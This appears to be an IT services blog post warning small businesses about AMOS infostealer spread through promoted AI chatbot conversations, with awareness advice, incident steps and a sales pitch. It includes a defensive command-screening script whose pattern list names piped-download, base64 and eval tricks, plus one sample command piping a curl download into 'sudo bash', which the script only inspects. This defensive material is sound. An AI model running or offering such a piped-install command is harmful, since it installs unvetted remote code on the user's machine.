AI Chatbots Are Being Weaponized to Spread Malware: What SMBs Need to Know

Cybercriminals have found a new attack vector that bypasses traditional security awareness: weaponized AI chatbot conversations promoted through Google Ads. Here's how the attack works and what your business can do to stay protected.

Breaking Threat Alert

Security researchers have discovered active campaigns using ChatGPT, Grok, and Google search results to distribute the AMOS infostealer malware. This attack is particularly dangerous because it exploits the trust users place in AI assistants and major search engines.

Your employees probably use AI chatbots like ChatGPT every day to get quick answers, write emails, or troubleshoot computer problems. Unfortunately, hackers are now exploiting that trust to install malware on business computers, and this new attack vector is unlike anything we've seen before.

In December 2025, security firms Huntress and Malwarebytes discovered a sophisticated campaign where attackers weaponized AI chatbot conversations to spread the Atomic macOS Stealer (AMOS), an information-stealing malware targeting Mac users. The attack is particularly insidious because it bypasses almost every red flag users are trained to watch for.

How the Attack Works

The genius of this attack is its simplicity. Instead of trying to get past spam filters or trick users into downloading suspicious files, attackers exploit something far more dangerous: the implicit trust people place in Google search results and AI assistants.

The Attack Chain:

  1. Attacker creates a malicious AI conversation - The hacker crafts a ChatGPT or Grok conversation that appears to answer a common question (like "how to clear disk space on Mac") but includes malicious Terminal commands.
  2. Conversation is made public and promoted - The attacker uses the AI platform's sharing features to make the conversation public, then pays to boost it in Google search results or runs Google Ads pointing to it.
  3. Victim searches for innocent help - An employee searches Google for something routine, like "how to free up disk space on macOS," and sees what looks like a legitimate ChatGPT result at the top of the page.
  4. Victim follows "helpful" instructions - The AI conversation presents clear, professional-looking Terminal commands. The user copies and pastes them, unknowingly executing malware.
  5. Malware harvests credentials - AMOS immediately begins stealing passwords, browser data, cryptocurrency wallets, and other sensitive information.

Why This Attack Is So Dangerous for Small Businesses

Traditional security awareness training teaches employees to watch for suspicious emails, strange downloads, and unfamiliar websites. This attack bypasses all of those warnings:

  • No suspicious downloads - The victim isn't downloading an .exe or .dmg file
  • No phishing emails - The attack starts from a trusted Google search
  • Trusted platforms - ChatGPT and Google are tools employees use daily
  • Professional appearance - AI-generated responses look polished and authoritative
  • Targeted queries - Attackers focus on searches IT-savvy users would make

The malicious ChatGPT link was live for 12 hours before being discovered and removed, potentially infecting numerous victims.

What Is AMOS and Why Should You Care?

AMOS (Atomic macOS Stealer) is an information-stealing malware specifically designed for Mac computers. Once installed, it can:

  • Harvest all saved passwords from browsers and the macOS Keychain
  • Steal browser session cookies, allowing attackers to hijack logged-in accounts
  • Extract cryptocurrency wallet data from popular wallet applications
  • Capture authentication tokens for cloud services like Microsoft 365 and Google Workspace
  • Establish persistence to survive reboots and continue exfiltrating data

For a small business, a single AMOS infection could expose client data, financial accounts, email archives, and cloud storage, potentially resulting in a serious data breach.

Mac Users Aren't Immune

Many businesses believe Macs don't get malware. This attack specifically targets Mac users who may have a false sense of security. If your company uses Macs, this threat applies directly to you.

The Google Ads Problem

This attack relies heavily on Google Ads to reach victims. Cybercriminals purchase ads that appear at the top of search results, mimicking legitimate content. The ads are designed to look virtually identical to organic search results, requiring users to click a small menu icon to verify the advertiser's identity.

For small businesses, this means:

  • Your employees may click malicious ads thinking they're legitimate search results
  • Ad blockers may not catch all sponsored malicious content
  • Even tech-savvy users can be fooled by professional-looking AI conversations

How to Protect Your Business

1. Update Your Security Awareness Training

Your employees need to know about this new threat vector. Traditional "don't click suspicious links" training isn't enough anymore.

New Training Topics to Add:

  • Never copy-paste Terminal or Command Prompt commands from online sources without understanding them
  • AI chatbot conversations can be manipulated and shouldn't be implicitly trusted
  • Sponsored search results may be malicious, even if they point to legitimate-looking sites
  • When in doubt, ask IT before running any commands on your computer

2. Implement Technical Controls

Security awareness alone isn't sufficient. You need technical safeguards that protect users even when they make mistakes.

  • Endpoint Detection and Response (EDR) - Modern endpoint protection can detect and block AMOS and similar infostealers before they execute
  • DNS filtering - Block known malicious domains at the network level
  • Web content filtering - Restrict access to potentially dangerous content categories
  • Application whitelisting - Prevent unauthorized applications from running
  • Browser security extensions - Deploy extensions that warn about suspicious sites

3. Consider Ad Blocking

Given that malicious Google Ads are a primary attack vector, businesses should evaluate whether ad blocking makes sense for their environment. While this may impact some legitimate services, it eliminates a significant attack surface.

4. Establish an IT Approval Process

Create a simple policy: employees should contact IT before running any Terminal commands, scripts, or "technical fixes" they find online. A quick Slack message or email to your IT team could prevent a major breach.
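One way to back both the "never paste commands you don't understand" training point and the IT approval policy is a small screening script staff (or the IT desk) can run on a pasted command before anyone executes it. This is an added example, not code from the original post or from the researchers it cites; the pattern list, messages and sample commands are constructed here.

```shell
#!/bin/sh
# vet_command "<command text>"
# Prints one WARN line per risk pattern found and returns the number of
# matches (0 = nothing matched). Pattern list and messages are constructed
# for this example; it is a screening aid, not a malware detector.
vet_command() {
    cmd=$1
    hits=0
    # Each line below: regex '#' explanation (the regexes contain no '#')
    while IFS='#' read -r pat reason; do
        if printf '%s\n' "$cmd" | grep -Eq -- "$pat"; then
            echo "WARN: $reason"
            hits=$((hits + 1))
        fi
    done <<'EOF'
(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba|z)?sh([[:space:]]|$)#downloads something and pipes it straight into a shell
base64[[:space:]]+(-[dD]|--decode)#decodes base64 at run time, so you cannot see what really executes
(^|[[:space:];&|])eval[[:space:]]#builds a command from a string with eval
(python[0-9.]*|osascript|perl|ruby)[[:space:]]+-[ce][[:space:]]#runs an inline script in another interpreter
(^|[[:space:];&|])sudo[[:space:]]#asks for administrator rights
(^|[[:space:]=])(/private)?/tmp/|/var/folders/#writes to or runs from a temporary directory
EOF
    if [ "$hits" -eq 0 ]; then
        echo "OK: no known risk patterns (still read every word before running it)"
    fi
    return $hits
}

# Demo on a constructed command; nothing here is executed, only inspected.
vet_command 'curl -fsSL https://example.invalid/cleanup.sh | sudo bash' \
    || echo "=> $? warning(s): do not run this; send it to IT first"
```

A command that clears the screen is not proof of safety; the script only catches the shapes a one-line installer usually takes, so an "OK" still means reading the command, not trusting it.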


What to Do If You Think You're Infected

If an employee may have executed a suspicious command, take these steps immediately:

  1. Disconnect the computer from the network - This limits the malware's ability to exfiltrate data or spread
  2. Don't log into any accounts on the affected device - The malware may be capturing credentials in real-time
  3. Contact your IT provider or security team - They can analyze the device and determine the extent of the compromise
  4. Change passwords from a known-clean device - Prioritize email, banking, and cloud service passwords
  5. Enable MFA everywhere - Even if credentials were stolen, MFA can prevent account takeover
  6. Check for unauthorized access - Review login histories for email, cloud storage, and banking

For confirmed AMOS infections, security experts recommend:

  • Remove suspicious Login Items and LaunchAgents/LaunchDaemons
  • Consider a full macOS reinstall from clean backups
  • Check for rogue browser extensions
  • Verify cryptocurrency wallet integrity if applicable
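To support the "remove suspicious LaunchAgents/LaunchDaemons" step, here is an added example (not from the original post, and not an Apple or vendor tool) that lists launchd items whose program runs from an unusual place or is a bare interpreter, so a responder knows which plists to read first. The location allowlist and heuristics are this example's own choices.

```shell
#!/bin/sh
# audit_launch_items DIR
# Lists launchd plists in DIR whose program lives outside the usual
# Apple/system locations or is a bare interpreter, printing
# "label<TAB>program<TAB>reason" per finding and returning the count.
# Heuristics and locations are this example's choices, not Apple guidance.
audit_launch_items() {
    dir=$1
    found=0
    for plist in "$dir"/*.plist; do
        [ -f "$plist" ] || continue
        # Flatten the XML so one sed expression can pull out a key/value pair
        flat=$(tr -d '\n\t' < "$plist")
        label=$(printf '%s' "$flat" | sed -En 's/.*<key>Label<\/key> *<string>([^<]*)<\/string>.*/\1/p')
        prog=$(printf '%s' "$flat" | sed -En 's/.*<key>Program(Arguments)?<\/key> *(<array> *)?<string>([^<]*)<\/string>.*/\3/p')
        case ${prog:-?} in
            /bin/*sh|/usr/bin/python*|/usr/bin/osascript|/usr/bin/perl|/usr/bin/ruby)
                reason="starts an interpreter; read its arguments" ;;
            /System/*|/usr/*|/bin/*|/sbin/*|/Applications/*|/Library/Apple/*)
                continue ;;  # standard location: skip
            /tmp/*|/private/tmp/*|/var/folders/*|/Users/Shared/*)
                reason="runs from a temporary or shared directory" ;;
            *)  reason="runs from an unusual location" ;;
        esac
        printf '%s\t%s\t%s\n' "${label:-?}" "${prog:-?}" "$reason"
        found=$((found + 1))
    done
    return $found
}

# Demo: scan the per-user and system launchd folders when present (macOS paths).
for d in "$HOME/Library/LaunchAgents" /Library/LaunchAgents /Library/LaunchDaemons; do
    [ -d "$d" ] || continue
    audit_launch_items "$d" || echo "=> $? item(s) to review in $d"
done
```

Run it from a known-clean admin shell and compare the output against what the machine is supposed to have; an empty list does not rule out Login Items or other persistence the script does not cover.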

The Bigger Picture: AI as an Attack Vector

This attack represents a fundamental shift in how cybercriminals operate. As AI tools become ubiquitous in the workplace, they're also becoming tools for attackers. The trust users place in AI responses, combined with the authority these tools appear to have, creates a perfect storm for social engineering.

We expect to see more attacks exploiting AI platforms in 2025 and beyond. Businesses need to adapt their security strategies now, before these techniques become even more sophisticated.

Key Takeaways for Business Owners

Action Items:

  • Brief your team about this new threat immediately
  • Implement a "no command-line commands without IT approval" policy
  • Ensure endpoint protection is deployed on all devices, including Macs
  • Consider DNS filtering and ad blocking at the network level
  • Review and update your incident response procedures
  • Schedule regular security awareness refresher training

Need Help Securing Your Business?

This emerging threat underscores why proactive security management is essential for small businesses. At LocalEdgeIT, we help Denver businesses implement layered security strategies that protect against both traditional and emerging threats.

Our managed security services include endpoint protection, DNS filtering, security awareness training, and 24/7 monitoring, giving you peace of mind that your business is protected even as threats evolve.

Ready to strengthen your security? Take our free IT Security Assessment to identify gaps in your current protection, or contact us to discuss your security needs.